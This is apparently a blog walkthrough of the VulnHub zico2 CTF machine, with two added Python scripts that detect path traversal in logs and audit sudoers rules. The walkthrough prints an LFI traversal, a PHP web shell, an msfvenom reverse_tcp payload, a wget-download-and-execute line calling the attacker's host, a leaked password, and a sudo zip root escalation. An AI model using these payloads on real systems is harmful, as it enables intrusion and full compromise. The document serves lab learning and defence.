**VulnHub zico2: 1 Walkthrough**
Target machine address: https://www.vulnhub.com/entry/zico2-1,210/
Target difficulty: Intermediate (CTF)
Release date: June 19, 2017
Description:
Zico is trying to build his own website, but had some trouble choosing which CMS to use. After trying some popular ones, he decided to build it his own way. Is that a good idea?
Hint: enumeration, enumeration, and more enumeration!
Goal: get root access and find flag.txt
Author: Dayu
Time: 2020-01-23
Note: I run all of these machines in VMware after downloading them, and I use Kali Linux as the attacker machine for solving the CTF. The techniques used here are for learning and educational purposes only; if they are used for any other purpose, I take no responsibility.
1. Information gathering
First we need to identify the target VM's IP address; use nmap to find it:
We have found the CTF target's IP address: 192.168.56.128
An nmap port scan shows ports 22, 80, 111 and 50702 open ...
Check the web port:
Scroll down ...
Click to enter ...
You can see the URL of the tools.html page ... it could be vulnerable to LFI, so let's try ...
Try the LFI: it works using a ../ traversal path to /etc/passwd ... here we find the zico user ...
We were told earlier to enumerate, so I'll run a directory brute-force and take a look ...
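The LFI found above is the kind of request a web server log records directly. As an added example that is not part of the original walkthrough, here is a small Python scanner that reads access-log lines, percent-decodes the request URL, and flags traversal sequences and reads of sensitive files such as /etc/passwd. The log lines are constructed; the attacker address and the view.php script name are assumptions, not values from the target.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original page). The
# client address and the view.php script name are assumptions; the
# traversal request mirrors what the walkthrough describes.
SAMPLE_LOG = """\
192.168.56.103 - - [23/Jan/2020:10:01:02 +0000] "GET /view.php?page=tools.html HTTP/1.1" 200 1523
192.168.56.103 - - [23/Jan/2020:10:01:15 +0000] "GET /view.php?page=../../../../etc/passwd HTTP/1.1" 200 1944
192.168.56.103 - - [23/Jan/2020:10:01:20 +0000] "GET /view.php?page=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1944
192.168.56.103 - - [23/Jan/2020:10:01:31 +0000] "GET /dbadmin/test_db.php HTTP/1.1" 200 812
"""

# Common log format: client, identity, user, [timestamp], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)

# Traversal in either slash style, checked after decoding
TRAVERSAL_RE = re.compile(r'\.\.(/|\\)')

# Files whose appearance in a request URL is almost never legitimate
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "wp-config.php")


def decode_url(url: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times so %2e%2e%2f and double-encoded
    variants are compared in their plain form."""
    for _ in range(rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url


def scan_access_log(text: str) -> list:
    """Return one finding per log line whose decoded URL contains a traversal
    sequence or names a sensitive file, with the reasons it was flagged."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these
        url = decode_url(m.group("url"))
        reasons = []
        if TRAVERSAL_RE.search(url):
            reasons.append("path traversal")
        for name in SENSITIVE_FILES:
            if name in url:
                reasons.append(f"sensitive file {name}")
        if reasons:
            findings.append({
                "line": lineno,
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "url": url,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} {f['status']} {f['url']} -> {', '.join(f['reasons'])}")
```

The status code is kept in each finding because a 200 on a traversal request, as in the sample, means the file was actually served, which is the case worth alerting on first; a 404 or 403 on the same URL is a probe that failed. The decode step is what makes the third sample line match, since its raw form contains no literal "../".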
Browsing the /dbadmin/ directory reveals the file test_db.php ... open it
You can see a PHP database login page along with its version ...
Logging in with the default password admin succeeds ...
From here I found three ways forward for escalating ...
file upload ... LFI injection ... inserting a shell into the page ...
After reviewing them, the steps can be carried out as follows ...
Command: <?php echo system($_GET["cmd"]); ?>
You can see the PHP script has been saved in the database ...
2. Privilege escalation
Execute the file ... here you can see we are running as www-data ...
The idea here is very simple: first create a shell payload locally ...
Command: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.56.103 lport=4444 -f elf > shell
Open msf. Unfortunately, I don't know why, but simply uploading the shell and running it should have given a session straight away, yet it did not work reliably, so I could only rely on MSF to get this machine first, otherwise I would have lost my mind ...
Command: <?php system("cd /tmp;wget http://192.168.56.103:8000/shell;chmod +x shell;./shell");?>
Revisit the page ...
Here ... after successfully getting a shell, go into the zico user's home and find the wordpress directory; inside it there must be a wp-config.php file where you can view the account password ... common sense
sWfCsfJSPV9H3AmQzw8
SSH login succeeded ...
Command: sudo zip /tmp/nisha.zip /home/zico/raj -T --unzip-command="sh -c /bin/bash"
You can see that the user can run tar and zip as root without entering any password ...
Compress the file raj into the archive /tmp/nisha.zip, then have it unpacked with the given unzip command, which pops a root shell ...
Root obtained successfully and flag.txt found ...
Since we have root and found flag.txt, this simple machine is done. I hope you like it; keep following Dayu, there will be more challenging machines later, along with exercises to learn from.
If you have other methods, feel free to leave a message. If anything here is wrong, please tell me. If you think this blog is well written, please share it with the people around you.
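The sudo rule that makes this escalation possible is a configuration mistake that can be found before an attacker does. As an added example that is not part of the original walkthrough, here is a Python audit that parses sudoers-style rules and flags commands runnable as root that are known to hand the caller a shell (zip and tar are the two found above), together with whether NOPASSWD applies. The sudoers text is constructed to match what the walkthrough reports; the exact rule on the real machine may differ, and the list of shell-escape binaries is illustrative rather than complete.

```python
import re
from os.path import basename

# Binaries that can hand the caller a shell when run as root; zip and tar
# are the two the walkthrough found. Illustrative list, not complete.
SHELL_ESCAPE_BINS = {"zip", "tar", "vim", "less", "find", "python"}

# Constructed sudoers content (not copied from the target); the zico rule
# matches what the walkthrough reports.
SAMPLE_SUDOERS = """\
# /etc/sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
zico    ALL=(root) NOPASSWD: /usr/bin/zip, /bin/tar
%admin  ALL=(ALL) ALL
"""

# user  host=(runas) TAG: cmd, cmd
RULE_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\))?\s*'
    r'(?P<tags>(?:[A-Z]+:\s*)*)'
    r'(?P<cmds>.+)$'
)


def audit_sudoers(text: str) -> list:
    """Return one finding per sudo rule command that grants a shell-escape
    binary or unrestricted ALL, noting whether a password is required."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("Defaults") or line.split()[0].endswith("_Alias"):
            continue                                  # not a user rule
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        runas = m.group("runas") or "root"            # sudo defaults to root
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            prog = basename(cmd.split()[0])
            finding = {
                "user": m.group("user"),
                "runas": runas,
                "nopasswd": nopasswd,
                "command": cmd,
                "binary": prog,
            }
            if cmd == "ALL":
                if nopasswd:
                    finding["reason"] = "unrestricted sudo without password"
                    findings.append(finding)
            elif prog in SHELL_ESCAPE_BINS:
                finding["reason"] = "shell-escape binary runnable as " + runas
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        pw = "NOPASSWD" if f["nopasswd"] else "password"
        print(f"{f['user']}: {f['command']} ({pw}) -> {f['reason']}")
```

Run it over the contents of /etc/sudoers and the files in /etc/sudoers.d, read as root. A hit on a shell-escape binary is a problem regardless of NOPASSWD, since the user already knows their own password; the fix is to remove the rule or replace it with a narrow wrapper script that takes no user-controlled arguments.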